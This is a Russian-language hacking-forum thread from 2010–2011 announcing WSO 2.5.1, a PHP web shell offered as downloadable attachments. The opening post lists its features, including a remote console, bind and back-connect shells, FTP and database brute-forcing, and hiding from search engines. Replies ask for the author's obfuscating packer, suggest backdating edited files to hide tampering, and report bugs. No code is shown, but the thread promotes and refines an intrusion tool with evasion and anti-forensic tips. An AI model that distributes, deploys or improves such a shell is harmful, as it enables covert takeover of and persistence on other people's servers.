Старый 31.12.2010, 10:48   #1
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию WSO 2.5.1 (web shell)

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Описание возможностей / особенности:
  • Авторизация на cookies
  • Информация о сервере
  • Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
  • Просмотр, hexview, редактирование, скачивание, загрузка файлов
  • Работа с zip архивами (упаковка, распаковка) + сжатие в tar.gz
  • Консоль
  • SQL менеджер (MySql, PostgreSql)
  • Выполнение PHP кода
  • Работа со строками + поиск хеша в онлайн базах
  • Биндпорт и бек-коннект (Perl)
  • Bruteforce FTP, MySQL, PgSQL
  • Поиск файлов, поиск текста в файлах
  • Поддержка *nix-like и Windows систем
  • Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
  • Можно использовать AJAX
  • Небольшой размер. Упакованная версия занимает 22.8 Kb
  • Выбор кодировки, в которой работает шелл.
Changelog (v2.5):
Код:
Вместо сессий теперь используется cookies
Исправлен поиск по exploit-db.com
Убран раздел Safe-mode
Шелл корректно работает при disabled_functions = scandir
Теперь можно искать не только текст в файлах, но и просто файлы по маске
Переработан mysql dump
Изменен список сервисов в "Search for hash"
Убраны изображения из phpinfo()
"Мелкая косметика"
Исправление других мелких багов
Альтернативные версии шелла, сделанные сообществом:
Вложения
Тип файла: gz wso2.php.gz (18.0 Кб, 43946 просмотров)
Тип файла: gz wso2_pack.php.gz (18.3 Кб, 21979 просмотров)
__________________
Не оказываю никаких услуг.
I don't provide any services.

Последний раз редактировалось oRb; 07.11.2011 в 10:52..
oRb вне форума   Ответить с цитированием
Старый 31.12.2010, 14:37   #2
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Шикаарно, подарок на новый год, давно ждал, щас буду тестировать в боевых условиях.
Цитата:
Сообщение от oRb Посмотреть сообщение
Шелл корректно работает при disabled_functions = scandir
Как и советовал грей. Отлично, что на это было обращено внимание.

Единственное чё, oRb, ты бы всё таки выложил свой пакер, через preg_replace/e, я смотрю он хитрый, там смешанный HEX код с base64 сделан, пригодится.
Nightmare вне форума   Ответить с цитированием
Старый 01.01.2011, 03:35   #3
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

Считаю большим упущением то что шел не отображает устройства и линки, возможно и еще что-то, сокеты и пайпы например.
tex вне форума   Ответить с цитированием
Старый 01.01.2011, 10:03   #4
Aels
 
Аватар для Aels
 
Регистрация: 24.12.2010
Сообщений: 16
Репутация: 2
По умолчанию

хм. от себя добавлю.
возможно имеет смысл при редактировании файла сразу применять к нему тач на предыдущую дату (всеравно это каждый раз делать руками)
Aels вне форума   Ответить с цитированием
Старый 01.01.2011, 19:16   #5
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

Цитата:
Сообщение от Aels Посмотреть сообщение
хм. от себя добавлю.
возможно имеет смысл при редактировании файла сразу применять к нему тач на предыдущую дату (всеравно это каждый раз делать руками)
Так и делается.
Цитата:
Сообщение от tex Посмотреть сообщение
Считаю большим упущением то что шел не отображает устройства и линки, возможно и еще что-то, сокеты и пайпы например.
Линки обрабатываются: в поле Size пишется - link, а при наведении указывается адрес. В пхп есть функции is_link, is_dir, is_file. Всю информацию я стараюсь обрабатывать только стандартными функциями, для максимальной совместимости с различными серверами.
Цитата:
Сообщение от Nightmare Посмотреть сообщение
Единственное чё, oRb, ты бы всё таки выложил свой пакер, через preg_replace/e, я смотрю он хитрый, там смешанный HEX код с base64 сделан, пригодится.
там все просто. Код оставил на работе, счас написать его заного не в состоянии. Скину позже)
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Старый 01.01.2011, 21:48   #6
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

Цитата:
Сообщение от oRb Посмотреть сообщение
Линки обрабатываются
А да, я ошибся- линки обрабатываются, но все остальное что я перечислил нет.
Не знаю какие именно нестандартные функции ты имеешь ввиду, но есть одна простая filetype() например.
tex вне форума   Ответить с цитированием
Старый 04.01.2011, 16:18   #7
M1lten
 
Регистрация: 02.12.2010
Сообщений: 40
Репутация: -1
По умолчанию

Спасибо за обновление! Хотел задать вопрос.. Мне нужен один каталог, в нем много файлов, я выбираю Compress (zip), подтверждаю имя, но ничего не получается... Так же и с tar.gz . Наверное не установлен архиватор на сервере или что? Просто консоль почему-то тоже не могу использовать =(


Вот еще ошибка появляется
Цитата:
Warning: Invalid argument supplied for foreach() in /путь/ on line 594
M1lten вне форума   Ответить с цитированием
Старый 04.01.2011, 18:38   #8
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Скорее всего что в disable_function's есть system(), и возможно, что архивация идёт через системные команды.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 04.01.2011, 18:59   #9
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

И вот еще баг один появляется при сейфмоде когда readdir() видит файл а права не позволяют определить тип файла и в итоге он просто напросто не отображается.

Ну и еще мелочь -
Цитата:
Warning: date() [function.date]: It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'Europe/Moscow' for 'MSK/3.0/no DST' instead in
tex вне форума   Ответить с цитированием
Старый 10.01.2011, 15:40   #10
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

Хотелось бы в новой версии видеть сортировку таблицы файлов на жаваскрипте, без перезагрузки страницы.
http://tablesorter.com/docs/
Если автор не возражает могу сам прикрутить и кинуть на перепроверку исходного кода.
b3 вне форума   Ответить с цитированием
Ответ

Метки
shell, wso, wso2

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot